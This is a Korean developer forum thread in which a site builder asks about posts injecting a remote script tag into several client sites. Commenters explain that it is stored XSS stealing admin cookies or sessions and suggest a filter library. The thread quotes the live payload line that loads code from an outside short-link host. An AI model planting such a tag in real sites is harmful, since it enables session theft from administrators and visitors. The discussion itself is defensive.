니플
36k
2017-12-04 11:24:34 작성 2017-12-07 15:23:57 수정됨
9
1890

이거 뭔가요? 해킹 공격같은데 벌써 저번주 금요일부터해서 5건이 되었네요


사이트를 만들어 파는 업체에서 일하고 있는데


저번주 금요일부터 알 수 없는 해킹공격이 들어와서

해당 글을 삭제하는 등 작업을 하고 있습니다.


5건이 모두 다 다른 사이트입니다.


해당 글을 쓰게되면 레이어를 깨지게 하면서 이하 게시물이 보이지않게 되던데




확인해 보니 script 태그 내용이

<script src="http://u6.gg/VTdk"></script>

이런 태그를 넣고 있어요


이게 뭔지 궁금합니다.

0
0
  • 댓글 9

  • 애리밍
    3k
    2017-12-04 11:27:44 작성 2017-12-04 11:29:13 수정됨

    사이트 스크립팅 입니다. XSS 라고도 하는 전통적인 해킹 공격 기술이죠.

    해당 게시글을 관리자가 오픈했을때 저 스크립트의 파일이 실행되면서 관리자의 쿠키 또는 세션을 탈취합니다. XSS 방어 로직만 들어가 있으면 크게 걱정 하시지 않으셔도 됩니다.

    2
  • ....
    2017-12-04 11:33:50

    알려주셔서 감사합니다.ㅎㅎ

    0
  • XSS
    12
    2017-12-04 11:59:12

    !?

    0
  • 더미
    14k
    2017-12-04 13:51:56

    https://github.com/naver/lucy-xss-servlet-filter

    루시 필터입니다 사용해보세요.

    1
  • ....
    2017-12-04 15:43:26

    제가 자바 유저가 아니라서

    사용은 어렵습니다.ㅎㅎ


    그래도 주셔서 감사드려요 ㅎㅎ

    0
  • 아야로
    1k
    2017-12-04 19:21:50
    간이 배밖으로 튀어나왔네요.
    0
  • ....
    2017-12-04 19:25:48

    ?

    0
  • 추적추적
    114
    2017-12-07 15:19:13

    이미지에 홈페이지 주소가 나와있는데 안지워도 괜찮을까요..???

    0
  • ....
    2017-12-07 15:24:09

    지웟어요 ㅎㅎ

    감사합니다.

    0
  • 로그인을 하시면 댓글을 등록할 수 있습니다.